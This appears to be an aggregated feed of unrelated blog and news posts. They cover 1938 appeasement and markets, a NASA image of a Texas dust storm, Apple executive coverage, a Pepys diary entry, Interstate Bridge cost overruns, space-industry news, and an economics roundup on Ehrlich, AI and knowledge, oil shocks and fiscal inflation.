From a strictly market viewpoint the news of the decision of the Czech Government to capitulate to the demands that it cede the Sudeten area to Germany was favorable. Prices, quite naturally, improved as the threat of war seemed to recede. But this was “good news” with a difference; hardly the sort of good news to capture the imagination of individual traders and evoke a spirit of bullishness. Even in Wall Street, where the mental processes are supposed to be exceedingly realistic, there was a sufficiently powerful sense of the tragedy involved in Czechoslovakia’s surrender and the unhappy role that Britain and France played in bringing it about to dampen the normal speculative impulses. (NYT, 9/22/38, p. 33)
I suspect that the US stock market might rise if Trump were to pressure Ukraine into surrendering to Russia, or even ceding the Sudetenland . . . er . . . I mean the Donbas. Call me a hypocrite, but I worry about the tail risk of appeasing Putin.
Another problem is that events can be ambiguous. Does the failure of oil to hit $150/barrel mean the war doesn’t matter all that much, or does it incorporate market expectations of a “Trump put”, an expectation that he would back off if the global energy outlook became extremely bad?
PS. What do you think of the NYT’s writing style back in 1938? It is obviously different from today, but I feel like someone else could evaluate that difference better than I can. Do you like it better or worse? Is it aimed at a more elite audience? Or is it simply more “literary”?
PPS. Tyler Cowen had this to say today:
On the precautionary side, we need a dash of the 1960s and ’70s New Left and libertarian anti-war ideologies, skeptical of Uncle Sam himself. We do not want to become the bad guys.
Yup.
I don’t believe that it’s corruption, but it’s not a good look.
The Ides of March brought perilous weather to West Texas and the state’s Panhandle. A strong cold front blasted south across the arid plains on March 15, 2026, bringing stiff winds that stirred up a curtain of dust. The cloud of suspended particles slashed visibility and made for treacherous travel as it swept across the region. The high winds, coupled with dry conditions, also raised the risk of wildland fires.
The MODIS (Moderate Resolution Imaging Spectroradiometer) on NASA’s Aqua satellite captured this image of blowing dust on its march across Texas at about 4:45 p.m. Central Time (21:45 Universal Time) on March 15. An image acquired by the Terra satellite about 5 hours earlier shows the wall of dust when it was approximately 150 miles (240 kilometers) to the northeast.
Footage captured by a storm chaser shows visibility plummeting to nearly zero as the dense plume passed; similar conditions contributed to a multivehicle crash in North Texas. The National Weather Service also issued a Red Flag Warning for March 15 due to the combination of high winds, low relative humidity, and dry fuels. Several wildland fires ignited in the Panhandle, prompting evacuations, according to news reports.
Weather conditions took a sharp turn with the cold front’s passage. A weather station in Pecos recorded a high of 88 degrees Fahrenheit (31 degrees Celsius) at 4:30 p.m. local time on March 15, around the time of this image. Temperatures then dropped abruptly, hitting a low of 39ºF (4ºC) around 6 a.m. the next morning. Pecos saw sustained winds of about 25 miles (40 kilometers) per hour with gusts up to 40 miles (64 kilometers) per hour on March 15. Several stations in the Panhandle clocked gusts over 60 miles (97 kilometers) per hour.
Much of northern and western Texas has been experiencing moderate or severe drought, according to the U.S. Drought Monitor. Though dust storms are typical in the region this time of year, the lack of rain parches vegetation, dries the land, and increases the area’s susceptibility to these events.
NASA Earth Observatory image by Michala Garrison, using MODIS data from NASA EOSDIS LANCE and GIBS/Worldview. Story by Lindsey Doermann.
Stay up-to-date with the latest content from NASA as we explore the universe and discover more about our home planet.

Clouds of dust lofted from the Sahara Desert brought hazy skies and muddy rain to Western Europe.

Dry, gusty conditions spurred fast-growing fires in Oklahoma and Kansas, along with dangerous dust storms across the region.

A blanket of snow spanned Michigan and much of the Great Lakes region following a potent cold snap.
The post Wave of Dust Rolls Through Texas appeared first on NASA Science.
AI lowers the cost of building businesses. But it raises the bar for sustaining advantage. More companies can start. Fewer can dominate.
That implies greater dispersion. More volatility. Less structural concentration. A market that rewards adaptability rather than mere size.
And it raises the question that follows logically from duration compression: if software moats erode faster, where does durable advantage reconcentrate? The answer may be in the places that resist compression, physical infrastructure, energy constraints, material bottlenecks, regulatory barriers. The assets that cannot be replicated with model access and API credits. The things that still require time.
Equity does not disappear in this world.
It transforms.
From ownership of stability to exposure to speed.
From franchises to call options.
And that is the structural shift beneath the surface panic, the real story unfolding in the Age of Agents.
Here is more from Jordi Visser.
The post Some simple economics of AI? appeared first on Marginal REVOLUTION.
MacKenzie Sigalos, writing for CNBC, under the misleading headline “Tim Cook Squashes Retirement Rumors, Says He ‘Can’t Imagine Life Without Apple’”:
Asked about reports that he was preparing to step aside, Cook told ABC, “No, I didn’t say that. I haven’t said that. I love what I do deeply. Twenty-eight years ago, I walked into Apple, and I’ve loved every day of it since.”
He added that he “can’t imagine life without Apple.”
The Good Morning America interview was with Michael Strahan, in a five-minute segment for the show. Strahan actually did a decent job. He asked Cook if Apple expects to be reimbursed for the $3+ billion dollars they spent on Trump’s tariffs last year, now that the Supreme Court has ruled them invalid. (Cook says they’re waiting to see what the courts say about getting that money back.) Strahan then asked a pretty pointed question about Cook’s high-profile appearances alongside Trump — attending the inauguration (Strahan didn’t mention that Cook paid Trump $1 million for the honor to attend), the 24-karat-gold Apple-logo trophy, attending the White House premiere of Melania. Cook answered by saying he’s not political and only cares about policy, which makes sense only if you believe government policy decisions aren’t political — which is to say it makes no sense. But Strahan asked, and Cook’s answer speaks for itself.
But to the point of Sigalos’s report on the interview for CNBC, Cook didn’t “squash” anything related to his tenure at Apple in that interview. Watch for yourself. Cook correctly points out that he himself has never said anything (in public, at least) about being tired or wanting to “step back a little bit”, as Strahan claimed he had read. But Cook does not refute that he might soon step aside as CEO, nor does he say he intends to remain CEO for the foreseeable future. It’s an incredibly deft non-answer that would remain true if Cook steps down as CEO in two weeks, on April 1 (Apple’s anniversary), and would remain true if he’s still CEO five years from now. (The “can’t imagine life without Apple” comment would fit like a glove if, say, he steps aside as CEO but becomes executive chairman of the board.)
This headline is journalistic malpractice from CNBC.
The rest of Sigalos’s report is even worse:
The comments come after a turbulent stretch for Apple’s C-suite. In December, the company lost AI chief John Giannandrea, its top lawyer and a key design executive in a single week — while chip guru Johny Srouji reportedly signaled he might leave, too.
The departures raised pointed questions about whether Cook’s operational leadership style is the right fit for the artificial intelligence era.
Where to even start with this? Jiminy.
Giannandrea was shown the door after he blew it with Apple Intelligence. Cook took Giannandrea’s responsibilities away almost a year ago, weeks after the company’s embarrassing admission that next-generation Siri would be delayed by at least a full year. The December news was that Giannandrea was officially “retiring”, but that was just Cook allowing him as graceful and dignified an exit as possible. He was effectively fired back in April or May.
Kate Adams, Apple’s general counsel, just plain old retired in December after a successful nine-year stint in the role. Lisa Jackson announced her retirement as VP of environment, policy, and social initiatives, alongside Adams. Zero drama around either of their departures — just, for Apple, coincidentally bad timing.
The Alan Dye leaving for Meta thing, that was unexpected, and, to some degree, turbulent. But I have yet to speak to a single person within Apple, nor a single UI designer outside Apple, who thinks it’s anything but good news for Apple that Dye jumped ship for Meta. Not just that Dye is a fraud of a UI designer. Not just that he and his inner circle have vandalized MacOS, the crown jewel of human-computer interaction. Not just that he and his team are given — or have taken — credit for innovative, high-quality work on VisionOS that really belongs to the interaction team Mike Rockwell put together for VisionOS. Not just that Dye left Apple for a rival company, period — something unheard of amongst Apple’s bleed-in-six-colors executive ranks. But that he left for Meta, of all fucking companies? That’s the proof that Dye (and his urban cowboy magazine-designer cohort) never belonged at Apple in the first place.
And then there’s the Srouji thing, which was reported only once, by Mark Gurman at Bloomberg, and then effectively retracted two days later after Srouji shot it down with a meant-to-leak memo to his staff. My own reporting, talking to several sources close to and in some cases within Apple’s executive ranks, is that there is no truth to Gurman’s Bloomberg report that Srouji threatened Tim Cook that he was considering leaving Apple for a competitor.
To believe that report, you need to believe not only that Srouji is unhappy while seeing his life’s work flourish, leading what is inarguably one of the most successful silicon design divisions in the history of computing, and but also that at age 62, he would consider leaving Apple not to retire but to head up chip design at another company — any of which possible destinations being a company that is years behind Apple in chip design. And you have to believe that it’s a successful tactic for senior executives at Apple to get what they want from Tim Cook by threatening him with poaching offers from competing companies. And that Johny Srouji would either personally leak this to Mark Gurman, or loose-lippedly blab about it to someone who would leak it to Mark Gurman. And that Gurman reporting the already-very-difficult-to-believe story at Bloomberg, making private negotiations public and embarrassing both Cook personally and Apple as a company, would lead Tim Cook to cave in and do whatever it took to make Srouji happy enough to stay at Apple and write that memo refuting the report.
That does not sound like Tim Cook.
Is that report, and all that it implies, possible? Sure. It’s also possible that monkeys might fly out of my butt. It’s also possible that the Srouji story was bogus, seeded by a company that had just poached an Apple executive, and had successfully spun that story in their favor to such an extent that Bloomberg called it a “major coup” in its headline, and their intention with the bogus Srouji story was to put the narrative out there to seed doubt about Apple as a company and Cook’s leadership, personally.
Mission accomplished, at least with the gullible reporters and editors at CNBC.
Fox Sports, on Twitter/X:
Tonight, watch the WBC Final in a full immersive experience on the Fox Sports XR app for the Galaxy XR headset powered by Android XR!
The Fox Sports app in the App Store is native only on iOS (iPhone and iPad), Apple TV, and Apple Watch. So, unless I’m missing something, not only are they not streaming it immersively on VisionOS, they don’t even have a native VisionOS app.
Jess Weatherbed, The Verge:
Samsung is preparing to axe its first three-panel foldable phone less than three months after launching the device in the US. Sales of the $2,899 Galaxy Z TriFold will first be wound down in Korea and then discontinued in the US once remaining inventory has been cleared, an unnamed Samsung spokesperson told Bloomberg.
Maybe five blades on a razor is too many?
Stephen Hackett:
I was just going about my day then James Thomson of PCalc and other fine applications dropped these images on me and said I could share them.
Also, something fun for those of you with 3D printers.
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Up betimes and to my office a while, and then home and to Sir W. Batten, with whom by coach to St. Margaret’s Hill in Southwark, where the judge of the Admiralty came, and the rest of the Doctors of the Civill law, and some other Commissioners, whose Commission of Oyer and Terminer was read, and then the charge, given by Dr. Exton, which methought was somewhat dull, though he would seem to intend it to be very rhetoricall, saying that justice had two wings, one of which spread itself over the land, and the other over the water, which was this Admiralty Court. That being done, and the jury called, they broke up, and to dinner to a tavern hard by, where a great dinner, and I with them; but I perceive that this Court is yet but in its infancy (as to its rising again), and their design and consultation was, I could overhear them, how to proceed with the most solemnity, and spend time, there being only two businesses to do, which of themselves could not spend much time. In the afternoon to the court again, where, first, Abraham, the boatswain of the King’s pleasure boat, was tried for drowning a man; and next, Turpin, accused by our wicked rogue Field, for stealing the King’s timber; but after full examination, they were both acquitted, and as I was glad of the first, for the saving the man’s life, so I did take the other as a very good fortune to us; for if Turpin had been found guilty, it would have sounded very ill in the ears of all the world, in the business between Field and us.
So home with my mind at very great ease, over the water to the Tower, and thence, there being nobody at the office, we being absent, and so no office could be kept. Sir W. Batten and I to my Lord Mayor’s, where we found my Lord with Colonel Strangways and Sir Richard Floyd, Parliament-men, in the cellar drinking, where we sat with them, and then up; and by and by comes in Sir Richard Ford. In our drinking, which was always going, we had many discourses, but from all of them I do find Sir R. Ford a very able man of his brains and tongue, and a scholler. But my Lord Mayor I find to be a talking, bragging Bufflehead, a fellow that would be thought to have led all the City in the great business of bringing in the King, and that nobody understood his plots, and the dark lanthorn he walked by; but led them and plowed with them as oxen and asses (his own words) to do what he had a mind when in every discourse I observe him to be as very a coxcomb as I could have thought had been in the City. But he is resolved to do great matters in pulling down the shops quite through the City, as he hath done in many places, and will make a thorough passage quite through the City, through Canning-street, which indeed will be very fine. And then his precept, which he, in vain-glory, said he had drawn up himself, and hath printed it, against coachmen and carrmen affronting of the gentry in the street; it is drawn so like a fool, and some faults were openly found in it, that I believe he will have so much wit as not to proceed upon it though it be printed.
Here we staid talking till eleven at night, Sir R. Ford breaking to my Lord our business of our patent to be justices of the Peace in the City, which he stuck at mightily; but, however, Sir R. Ford knows him to be a fool, and so in his discourse he made him appear, and cajoled him into a consent to it: but so as I believe when he comes to his right mind tomorrow he will be of another opinion; and though Sir R. Ford moved it very weightily and neatly, yet I had rather it had been spared now.
But to see how he do rant, and pretend to sway all the City in the Court of Aldermen, and says plainly that they cannot do, nor will he suffer them to do, any thing but what he pleases; nor is there any officer of the City but of his putting in; nor any man that could have kept the City for the King thus well and long but him. And if the country can be preserved, he will undertake that the City shall not dare to stir again. When I am confident there is no man almost in the City cares a turd for him, nor hath he brains to outwit any ordinary tradesman.
So home and wrote a letter to Commissioner Pett to Chatham by all means to compose the business between Major Holmes and Cooper his master, and so to bed.
The IBR released new cost estimates confirming that the cost of the project will more than double, from a previous estimate of $6 billion, to an estimated $14.4 billion. IBR now admits costs could range from $13.5 to $15.2 billion.
This validates earlier estimates obtained by City Observatory in January showing the costs would double from those estimated in 2022.
IBR is hiding the extent of the cost increase by saying it will move ahead with a Phase I project consisting of $7.5 billion to rebuild the bridge, approaches and light rail, but it has only about $5 billion of that revenue identified. But it isn’t just $2.5 billion short; the reality is that it is $10 billion or more short of what it fully intends to spend.
The “core set of projects” is effectively half of Solomon’s baby; once you build a new high level bridge, you have to rebuild the approaches and interchanges. The high level bridge requires elevated freeways on both the Oregon and Washington sides of the river, with new interchanges elevated high into the air to reach the new roadway. ODOT & WSDOT have intentionally designed this so once you start, you must build everything. The reality is they’ll never stop with Phase I, start construction and you’re signing up for $15 billion and 20 years of construction hell.
This is the classic Robert Moses strategy: Say anything, promise anything to get a little money to just get the project started, knowing that once it starts, it will be almost impossible for anyone to say “no,” no matter how much it costs.
Robert Caro, (h/t to Bob Ortbland)
Even the IBR’s low-ball “core” cost estimate leaves out essential major costs. For example, the budget indicates they have no money to pay for the $488 million cost of removing the two existing bridges. You can expect more hidden charges once we see the actual cost estimate.
IBR likes to blame inflation, but that’s not the reason the cost of the project has doubled in the past three years. This isn’t merely “inflation”–the project’s own estimates of the effects of higher inflation explains only about $1 billion of the almost $10 billion increase in project costs since 2022.
The IBR will start construction on the project in 2028, with less than a third of the money need to complete it. Once started, IBR will use the partly built project to lobby for more and more money.
A doomsday scenario
This is a reckless approach to building a bloated mega-project. Here’s the scenario we face, going forward.
To raise about $1.2 billion, IBR will need to toll the I-5 bridges, at likely $3 or more for peak hour drivers, starting in 2027. This will immediately cause traffic will drop from its current level of 127,000 vehicles, and permanently reduce I-5 traffic less than 90,000 vehicles daily–effectively eliminating the need for a wider roadway. (IBR’s press release also lies about current I-5 traffic levels which it falsely claims are “more than 143,000 vehicles daily). Meanwhile, drivers avoiding tolls will gridlock the I-205 bridge. In the mid-2030, when the new bridges open to traffic, we’ll have a half-finished, half-full highway, and be committed to spending an additional $7 or $8 billion to “complete” the project, with construction running through at least the mid-2040s.
As the repeated delays of the past two years and today’s estimate makes clear, ODOT and WSDOT are incapable of accurately estimating project costs. The two state agencies have delayed releasing this cost estimate for more than the past two years, and their previous director insisted on keeping it secret, even from the state Legislatures (for who the estimate was supposedly prepared). Costs have doubled in the past three years, and this project will extend over the next two decades.
What they have done is build in generous funding for staff and consultants: The fastest growing portion of the project cost is the 400% increase in staff and consultant costs, which are expected to run to $1.2 billion over the next 20 years. And keep in mind that these cost estimates come from a consulting team that said it has been paid $273 million over the past five years to build “basically the same project” as the failed Columbia River Crossing.
Finally, its particularly ironic, that as gas prices soar due to the Iran War, and the Oregon and Washington Transportation Departments face serious financial problems–so much so that they can’t afford to maintain existing roads and bridges–that the two Governors are committing to a $15 billion expenditure that will largely serve to subsidize increased car travel. Future generations will have to pay off the massive debts incurred for this project, and suffer the climate and economic effects of greater car dependence.
Links for you. Science:
Neanderthal males and human females had babies together, ancient DNA reveals
RFK Jr.’s war on vaccines is coming for the elderly
Hospitals fighting measles confront a challenge: Few doctors have seen it before
Novartis settles with Henrietta Lacks’ estate over use of her ‘stolen’ cells to advance medicine
A Billion Years Are Mysteriously Missing From Earth’s History. Now, We Know Why.
Chronic ocean heating fuels ‘staggering’ loss of marine life
Other:
The Trump Administration is Testing Conversion Therapy By Medically Experimenting on Trans People in Prisons
The Columnist
Startup Generates Caring Letters to Your Friends Using AI, Handwrites Them Using Robot Pen
Journalists Jailed by ICE Are Revealing the Horrors of Incarceration
Trump subpoena, administration probes taking shape, House Democrats say
The Crypto Chokehold: Trump’s return has vaulted pro-crypto interests into power. As they capture ever more Democrats, the political will to stop them is dwindling.
Idaho lawmakers under fire after man delivers racist testimony in brownface
Jesse Watters: “Epstein got his money from two Jewish billionaires” and “the Jewish banking dynasty, the Rothschilds”
Trans New Yorkers Deserve Better Than Mamdani’s Inaction On Trans Youth Care Closures
Katie Britt’s Trump whisperer strategy isn’t working for Alabama
Oligarchs Are Building The World’s Biggest Propaganda Machine. Their Success Isn’t Guaranteed.
The ‘Crazy’ Plot to Release the Epstein Files
Bored Now
THE SURGEON GENERAL MUST BE A PHYSICIAN, NOT AN INFLUENCER
Amazon BUSTED for Widespread Scheme to Inflate Prices Across the Economy
Why I have hope.
How Will Lewis Decimated the Washington Post
A Federalism Bottleneck? The Subnational Levers Constraining ICE
How the J. Edgar Hoover Building changed Pennsylvania Avenue
The Answers Issue 2026 (for D.C.)
Idaho considers an ‘apocalyptic’ choice for disabled people and families. Difficult budget decisions in a number of states are threatening vital programs for disabled people at home and caregivers in the workforce.
Lost Rembrandt painting verified by Dutch art experts
Polling shows Ohio public libraries have vast voter support
Residents want local governments to end contracts that let ICE train on their gun ranges
Meta Reels Is Filling Up With AI Slop of Faith Healers Performing Miraculous Cures
Push from Saudis, Israel helped move Trump to attack Iran
X Is Drowning in Disinformation Following US and Israeli Attack on Iran
Four Conditions Make Cash Transfers Save Lives. The success of other countries shows these programs can work in the United States.
Democracy really did die in darkness as Donald Trump’s unconstitutional war on Iran stamps America as a dictatorship.
Chlorine Dioxide, Raw Camel Milk: The FDA No Longer Warns Against These and Other Ineffective Autism Treatments
No one should feel sorry for former DHS Secretary Kristi Noem because, if anyone deserves this, she does:
A new report claims that former Secretary of Homeland Security Kristi Noem’s alleged boyfriend, Corey Lewandowski, dumped her after she was fired by Donald Trump. However, this has not been confirmed and is currently just a rumor. Noem was removed from her position as Homeland Security Secretary on March 6, 2026.
Multiple sources have claimed recently that Corey Lewandowski has parted ways with his alleged girlfriend, Kristi Noem, after she was fired as Homeland Security Secretary.
A source told Rob Shuter’s Naughty But Nice, “The relationship was always about power. Without the job and the access, Corey isn’t interested anymore. Corey loves proximity to power. When Kristi had it, he was glued to her. Now that she doesn’t, he’s gone.” Another source went on to state, “This was never a romance story. It was a power story.”
Leaving aside the salaciousness, they are all such conniving, dishonest people–and they all seem to be attracted to each other, if not romantically. While decency is not sufficient, as there are plenty of people who are upright in their personal lives, but absolutely awful in terms of policy, decency is necessary. They lack it entirely, and, worse, I do not think they even realize there is a better way to live as a human being. It’s clear the whole “empathy is bad” concept floating around right wing circles is an attempt to justify their personal decrepitude.
Just the worst people.
Aside: Much of husband’s family wants him to dump her, for what that’s worth.

South Korean startup Innospace says its inaugural launch failed in December when exhaust leaked from a combustion chamber and caused the rocket to break up.
The post Innospace completes investigation into Hanbit-Nano launch failure appeared first on SpaceNews.

The industry’s supply network, built for smaller volumes and slower production cycles, is struggling to keep pace.
The post Space boom strains supply chain, industry report warns appeared first on SpaceNews.

Guetlein: ‘We were asked to procure some additional space capabilities’
The post Golden Dome cost estimate rises to $185 billion as Pentagon expands space layer appeared first on SpaceNews.

Stuttgart, Germany – Marc. 17, 2026 – ISPTech, a German space technology company developing propulsion systems for agile in-orbit maneuvering, announced it has raised €5.5 million in seed funding to […]
The post ISPTech Raises €5.5M Seed Round to Redefine How Spacecraft Manoeuvre in Orbit appeared first on SpaceNews.

The Canadian military announced March 16 a major investment in both launch facilities and companies in a bid to create a sovereign space access capability.
The post Canadian military invests in sovereign launch appeared first on SpaceNews.

Before you ever set foot on a spacecraft bound for deep space, tiny replicas of your organs might make the journey first. Suspended in microgravity aboard a research mission, this organ-on-a-chip, or tissue chip, engineered from your own cells, could reveal how your body will respond to cosmic radiation and the weightlessness of space. As […]
The post An astronaut’s tiny stand-in: tissue chips in space health appeared first on SpaceNews.

The Trump administration has not yet decided whether to charge for space safety data despite a change in space policy enabling the government to do so.
The post Office of Space Commerce weighing options for TraCSS user fees appeared first on SpaceNews.
South Africa holds the grim distinction of being the most unequal country on Earth. South Africa leads the global ranking with a Gini index of 0.63. Statista The richest 10% of South Africans hold 71% of the wealth, while the poorest 60% hold just 7%. World Population Review This extreme inequality is largely rooted in history — economists attribute it to historical land ownership laws, the lingering socio-economic impacts of apartheid, and an economy heavily reliant on undiversified natural resource extraction. Data Pandas
The World (Global Gini) is trickier to pin down, because it measures inequality across all of humanity rather than within a single country. Different scholars estimate the global Gini index to range between 0.61 and 0.68. Wikipedia Interestingly, when measured this way — treating every person on Earth as part of one big “country” — global inequality ends up being comparable to South Africa’s, because the gap between the world’s richest and poorest nations is enormous.
That is from Claude.
The post One reason why South Africa is difficult to govern (South Africa fact of the day) appeared first on Marginal REVOLUTION.
It seems execution beats foresight:
Retail traders correctly forecast asset price direction yet lose money. Using 222 million prediction market trades with observable terminal payoffs, we decompose returns into a directional component (did the trader pick the right side?) and an execution component (did the trader get a favorable price?). Traders with above-random accuracy earn negative returns because they arrive late and pay unfavorable prices; traders with near-random accuracy profit through superior execution. These two dimensions of skill are nearly orthogonal (ρ ≈ 0.13), and split-sample tests confirm both are persistent. What separates profitable from unprofitable traders is not forecasting ability but execution: automated traders pay 2.52 cents less per contract than casual traders, and this gap alone accounts for the sign of returns across trader types. Being right and making money are not the same thing.
That is from Joshua Della Vedova. Via John de Palma.
The post Who profits from prediction markets? appeared first on Marginal REVOLUTION.
Live in Cape Town long enough and you lose interest in the outside world. Visitors from more exciting cities start yawning at your dinner table, but I no longer care. They have no possible conception of the unbearable bliss of fine summer days when the sea is warm and the figs are ripe and you start the morning with a dive into a cool green rock pool, followed perhaps by coffee in one of those impossibly quaint cafes and a spot of light typing, if I can manage to ignore the drama outside my window – tides rising, whales blowing, birds diving, the boats coming back to Kalk Bay. The Contessa and I often walk down to meet them, come home with a fat Cape salmon or snoek. Come sundown, we set the fish to grill on an open fire, uncork a bottle of wine, and, yes, congratulate ourselves for living in the last corner of Africa that is immune to chaos and madness.
The post Rich Elliott on Cape Town (from my email) appeared first on Marginal REVOLUTION.

Screenshot
I came across this old advertisement from the late 1970s.
At the time, still in the days of the Shah, Iran Air was a well-respected carrier with routes to the USA. Boeing 747-200s connected New York with Paris and London, with onward service to Tehran. A nonstop to Tehran was flown by a “special performance” 747SP.
The photo shows an SP in the carrier’s 70s-era livery, with the classic blue cheat-line and “Homa” tail logo.
Related Story:
The post March 17, 2026. New York to Tehran. appeared first on AskThePilot.com.

This roundup is in honor of Chris Sims, the extremely influential macroeconomist, who has just passed away. Item #4 even features some evidence for the Fiscal Theory of the Price Level, which he helped develop.
But first, podcasts. I went on the Members of Technical Staff Podcast with Jayden Clark to talk about the politics of the tech industry, and we ended up talking about a ton of fun stuff:
Anyway, on to the roundup. Before we get to the macro stuff, let’s talk about one of America’s worst public intellectuals…and a little about AI.
Paul Ehrlich, the author of The Population Bomb and a relentless advocate for population control, has died. One general rule of punditry is supposed to be that you don’t speak ill of the dead. But on the other hand, what if the dead had some really, really bad ideas?
We all know the story of why Ehrlich was wrong. He predicted that the world would run out of food, producing catastrophic famines in the 1970s. Based on those predictions, he called for things like cutting off emergency food aid to India, reasoning that if people were saved from starvation today, it would just mean more people to die of starvation later on. But new farming techniques known as the Green Revolution created enough calories to feed the whole world with plenty to spare. The Population Bomb came out in 1968; by then, famines were essentially already a thing of the past:
And fertility rates fell without the kind of draconian, dystopian population controls that Ehrlich constantly called for. The main country that listened to Ehrlich was China, and their One-Child Policy turned out to be quite unnecessary for reducing fertility rates — as well as being totalitarian, cruel, and dystopian.
What people don’t know about Ehrlich is how relentlessly he kept promoting his ideas and haughtily dismissing his critics, even after it had become clear that he had been completely wrong. A man who had endorsed nightmare policies in service to a broken theory simply never reckoned with this monumental failure, and continued to self-aggrandize and to evangelize for his old mistakes.
And in fact, Ehrlich’s bad ideas have survived and even thrived, in the form of the “degrowth” movement that’s popular in the UK and parts of Europe. Today’s degrowthers call for immiserating the developed-world middle class instead of starving India to death and throwing people in prison for having too many kids, which I suppose is an improvement. Still, the idea is fundamentally based on the same old fallacies that Ehrlich never stopped pushing — that humanity has overstepped its bounds and must be forcibly diminished.
One of the most interesting results in theoretical economics is the Grossman-Stiglitz Paradox.
Have you ever heard of the Efficient Market Hypothesis — the idea that financial market prices already incorporate all available information about the value of the underlying assets? Well, in 1980, Sanford Grossman and Joseph Stiglitz showed why the EMH can’t be quite right. The idea is pretty simple: It takes effort to find information. Who is going to go out and spend the effort to find out information about what stocks or bonds or houses are really worth, if they can’t make money trading on that information? And if no one spends the effort to find the information, how can it ever be incorporated into the price in the first place? Grossman and Stiglitz concluded that financial markets must be at least somewhat inefficient.
Now, Daron Acemoglu, Dingwen Kong and Asuman Ozdaglar have posited a similar problem for AI. I’m usually not a fan of Acemoglu’s papers on AI, but I think this one gets to an important and fundamental insight.
Acemoglu et al. write that if generative AI put all the information of the world at people’s fingertips, then people will have no incentive to go out and learn new things, which will then prevent them from accidentally finding new knowledge to add to the world’s total knowledge base:
We study how generative AI, and in particular agentic AI, shapes human learning incentives and the long-run evolution of society’s information ecosystem…Learning exhibits economies of scope: costly human effort jointly produces a private signal about their own context and a “thin” public signal that accumulates into the community’s stock of general knowledge, generating a learning externality. Agentic AI delivers…recommendations that substitute for human effort…[W]hile agentic AI can improve contemporaneous decision quality, it can also erode learning incentives that sustain long-run collective knowledge…[T]he economy can tip into a knowledge-collapse steady state in which general knowledge vanishes ultimately, despite high-quality personalized advice.
Basically, Acemoglu et al. posit that humanity as a whole learns new things when individual humans try to reinvent the wheel — to discover things on their own instead of just looking them up. This wastes a lot of effort, but it also adds to the overall knowledge base.
The idea here is that AI makes everyone really lazy — instead of trying to write a piece of code from scratch, or prove a math theorem from scratch, or figure out some piece of knowledge for yourself, you just ask AI to do it all for you. So everyone ends up getting the right answers to questions whose answers are already known, so they don’t end up adding anything new. It’s the Grossman-Stiglitz Paradox, but for everything.
In fact, you can sort of see hints of this happening already. Website traffic is collapsing, as people read AI instead of websites. Tech publications, for example, are rapidly losing their readership:

And using AI to code causes programmers’ skills to atrophy.
My first observation here is that this also applies not just to AI, but to the internet itself. Yes, people can ask an LLM to teach them about math or write some code for them. But they could also ask Math Exchange and Stack Exchange, even before LLMs existed. And the same problem arises — if all of the world’s knowledge is there at your fingertips, there’s no reason to waste your time reinventing the wheel. But as Neal Stephenson wrote as far back as 2011, this can lead to a lack of novelty, as everyone just copies what’s been done before.
And this leads me to my second thought: What if AI can also produce new knowledge? AI, after all, is prone to hallucination — i.e., random errors. If agents are out there randomly trying the wrong thing, occasionally they’ll discover something new. If there’s a way for those accidental discoveries to get incorporated into the general body of AI knowledge, then perhaps AI can grow the total knowledge stock instead of shrinking it. All that’s needed is to stop forcing humans to be the sole long-term repository of knowledge. How to do that, of course, I don’t know.
The Iran War is making everyone afraid to go through the Strait of Hormuz — the key maritime choke point that a significant part of the world’s oil must pass through in order to reach the world market. Iranian strikes and mines have effectively closed the strait, and European countries are refusing to help America reopen it (which is perhaps only natural, given Trump’s threats to seize Greenland from Europe, and his withdrawal of aid from the Ukraine war). As a result, oil prices have skyrocketed:
What will be the economic result? Fortunately, this is one of the rare areas where macroeconomists are actually able to make some predictions. Closure of key shipping routes is a thing that occasionally happens, and when it happens we can look at the short-term results and get a pretty clean picture of the effect.
That’s what Diego Känzig and Ramya Raghavan did last year in a paper entitled “The Macroeconomic Effects of Supply Chain Shocks: Evidence from Global Shipping Disruptions”. Basically, they look at similar incidents in the past, and try to quantify the economy’s average response. Here’s the picture they come up with:

Basically, commodity prices (e.g. oil) go up, inflation goes up as a result, and U.S. industrial production suffers.
Can we expect the same thing to happen this time? Maybe. One big change from the past is that thanks to the shale oil boom, the U.S. is now a net oil exporter, rather than a net importer:

That means that U.S. oil companies will see a big windfall from the war. But the inflation bump resulting from higher input prices will probably still happen, and oil-consuming industries — chemicals, transportation, etc. — will still probably suffer.
Governments all over the world are running up enormous levels of debt, so it’s important to know what the risks of that are. You can always get your central bank to lower interest rates to make government debt easier to refinance, or even have it print money to buy government debt directly. The problem is that this can cause inflation to rise. A macroeconomic theory called the Fiscal Theory of the Price Level — which drew heavily on Chris Sims’ ideas — predicts a tight relationship between the two.
Progressive macroeconomics types typically pooh-pooh this danger, pointing to cases like the Great Recession, or Japan in the 1990s and 2000s, where soaring levels of government debt didn’t lead to inflation. But Covid may be a counterexample to this complacency. A number of macroeconomics papers have come out recently that establish what looks like a link between Covid borrowing and subsequent post-pandemic inflation.
For example, Barro and Bianchi (2024) find that government spending “has substantial explanatory power for recent inflation rates across 20 non-Euro-zone countries and an aggregate of 17 Euro-zone countries”. And Reis (2026) finds that “the unexpected worsening of fiscal surplus during the period during and after the pandemic is strongly correlated with the unexpected increases in inflation.”
Reis blames America’s borrowing binge — primarily Trump’s CARES Act and its follow-up bill, but also Biden’s American Rescue Plan — for America’s higher rate of inflation after the pandemic:
How much did public deficits contribute to the inflation surge of 2021-24?…A popular argument notes that inflation rose in the US by almost as much as in other OECD countries. Yet, the US had a large fiscal stimulus in 2021 that most other countries did not. Therefore, the US fiscal stimulus did not contribute to the inflation surge. Is that right? No, it is not.
To inspect this claim, you can use expectations data…[Here’s a] plot [that] compares the unexpected high deficits with the unexpected high inflation terms for OECD countries, using the common units of their impact on the public debt…For countries that ran higher unexpected fiscal deficits, inflation was also unexpectedly higher.
And here’s his chart:

That’s not the tightest relationship I’ve ever seen, or the steepest slope. But it’s not nothing, either. And it’s worth remembering that Olivier Blanchard managed to predict the surge in inflation in advance, just by looking at how much the U.S. government was borrowing back in 2021.
Progressive pundits and Democratic think-tankers who like to hand-wave away the dangers of deficits need to think again. America is up in arms about the cost of living, and if Democrats get in power and just borrow more and more and more, it could make the problem worse.
I wrote a book about the promise of foreign investment in Japan. When I was on the book tour last year, a bunch of people, both Japanese and otherwise, asked me: “What industries should foreigners invest in in Japan?” My first answer was always the same: Robotics.
In a world where software is increasingly ruled by AI, robotics is the next frontier. But it’s a lot trickier — you have to combine AI techniques with a lot of hardware know-how. A lot of people think that this know-how resides primarily in China, because they look at charts of robot adoption. China has a lot of factories, and it has a lot of cheap bank loans that factories can use to buy robots, and so China buys a lot of robots. It’s also becoming more self-sufficient in the industry — making more of the robots it installs.
